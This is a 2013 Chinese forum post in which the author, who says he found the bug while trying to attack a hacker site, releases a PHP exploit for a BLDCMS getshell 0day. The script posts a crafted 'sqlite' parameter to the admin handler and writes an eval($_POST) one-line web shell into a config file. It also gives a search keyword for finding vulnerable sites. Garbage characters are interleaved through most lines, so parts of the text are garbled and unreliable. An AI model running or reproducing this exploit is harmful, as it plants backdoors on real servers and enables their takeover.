之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞3 U, S. h0 g# ^
$ P' ~# X5 B0 \ 0 E$ h" Y( T5 M+ x4 K" p3 C
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
# O- Q- v* [ U+ s& W
+ h9 R5 T# H4 f, p' h. ?既然都有人发了 我就把我之前写好的EXP放出来吧
: M' ~% W$ h9 P, }4 F | 9 T( x, x9 n8 b; g4 {6 n
view source print?01.php;">! g" D, u6 u( N
02.<!--?php. K, {. ?% r) K: E/ a: m4 H
03.echo "-------------------------------------------------------------------9 S' V5 D0 S ~; q4 m* ^5 w
04.
& a5 S& w9 @! s, `9 O05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP7 }; M$ i! J, c8 J6 V) }
06.
; D1 V+ s# e4 {7 \1 H8 W# G/ w, A07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
/ H5 w* |0 `& C7 F08.
2 E8 V9 q$ W" |! K6 T09.QQ:981009941\r\n 2013.3.21\r\n
9 l2 E$ t1 s8 b! u j' h! w10.
$ F) C' J2 |' T; w0 n! p6 [. e11. ' {2 j8 ~" T$ S$ ?
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
9 q* y X: a F5 p13. ! ?1 P# |. g3 R9 H. H7 I
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------5 p/ I: e: {& _ n/ d8 w# H/ U4 d" I
15. ; x: e1 `2 y( Q: L1 _; K2 x" ], m
16.--------------------------------------------------------------------\r\n";3 t# k7 }0 v" M0 E/ W; G
17.$url=$argv[1];
- t& x& d( L9 x7 `, B8 B8 T18.$dir=$argv[2];
4 I) H) O6 g+ y1 P19.$pass=$argv[3];
]& q% ?5 \% P2 I20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';4 E# m; |, L$ j; W) T' H$ |" D
21.if (emptyempty($pass)||emptyempty($url))0 L" P9 ~+ a; H. E# j0 }
22.{exit("请输入参数");}
" n( b. v& U) k' Q" K23.else9 @, F \9 P9 W7 O: a
24.{/ f- b+ T) A V+ a5 e' _
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev3 ?# I# T4 {( L5 c
26.
+ M0 N2 e, ^7 R m9 {' B3 D+ ~: W6 w27.al; F. b3 g! E% A6 {& W, c
28.$length = strlen($fuckdata);6 t b: S' r$ m$ \9 y, ]) V1 _
29.function getshell($url,$pass)
8 { c% H) Q9 [4 w- C; v) A30.{
7 E/ b$ _# A) d3 i2 N, [+ P31.global $url,$dir,$pass,$eval,$length,$fuckdata;
4 i& F% Z1 G0 o( `+ m% f32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
/ C8 C5 K- K$ t: L. x0 g33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";3 ~$ k- r3 g- E
34.$header .= "User-Agent: MSIE\r\n";& T# d: \$ S# i& k x9 S( G
35.$header .= "Host:".$url."\r\n"; E% x$ H8 t& C( i8 v% R" q) @
36.$header .= "Content-Length: ".$length."\r\n";2 l( i* f. z' L) T+ b
37.$header .= "Connection: Close\r\n";: [. d7 Z/ ^" X0 ~- r2 r |, S
38.$header .="\r\n";
+ k6 o. ~ u- O8 Q* ~" f6 h2 @39.$header .= $fuckdata."\r\n\r\n";
2 g9 p0 Y! u9 X' U, t40.$fp = fsockopen($url, 80,$errno,$errstr,15);* [1 P6 N* Q8 H" |7 u; f( `0 D. k0 K5 x/ E
41.if (!$fp)/ L/ v: c8 i8 D$ }
42.{
3 ~7 w' G3 D; ?' a) q/ a @, y43.exit ("利用失败:请检查指定目标是否能正常打开");
5 s( {% l& t" c- d9 ] ? m44.} G. g' k7 i$ n3 s
45.else{ if (!fputs($fp,$header))% ]" v" Y8 V" y+ e, H
46.{exit ("利用失败");}
9 O/ H, q+ Y! L3 ^# e- e( R, ]3 n47.else
: G [& R! C& R2 A* \# d" C48.{% p; t" P# j) X- s: e! u5 K; Q# a; L
49.$receive = '';
( c8 g- T( L0 V) B. ~50.while (!feof($fp)) {9 j% e: u4 B/ r/ C! ~6 e( U
51.$receive .= @fgets($fp, 1000);+ ~0 W. ?5 ^: j+ \2 r! s- l. s
52.}
) i6 y. {8 a. k1 e- L53.@fclose($fp);
u- j( O/ B0 c0 b3 m8 L- @54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标+ M1 M) Z% E0 b$ q2 q8 M8 M- m- I
55. 7 v1 T# o; d8 e
56.GPC是否=off)";
7 v7 n$ Z5 ]3 ^+ j9 N, w' k& k57.}}
`; b8 T& w% s/ l. ?58.}
: t! ^7 r" C. {6 T" L+ r) P* ?59.}- J; ?9 E0 ~7 E1 b2 ~
60.getshell($url,$pass);
! n$ F# i. g5 E8 O! `" S1 B. w61.?-->
- r' w4 e6 M W! `; X4 Z q8 `8 Z6 A P8 u( @( i/ b
$ J: o# |+ p6 p& j2 K/ W" L
5 P+ f S1 c$ x. y; g- Xby 数据流6 W3 N# s( d. u4 a
|
发表于 2013-3-26 20:49:10
收藏
分享
支持
反对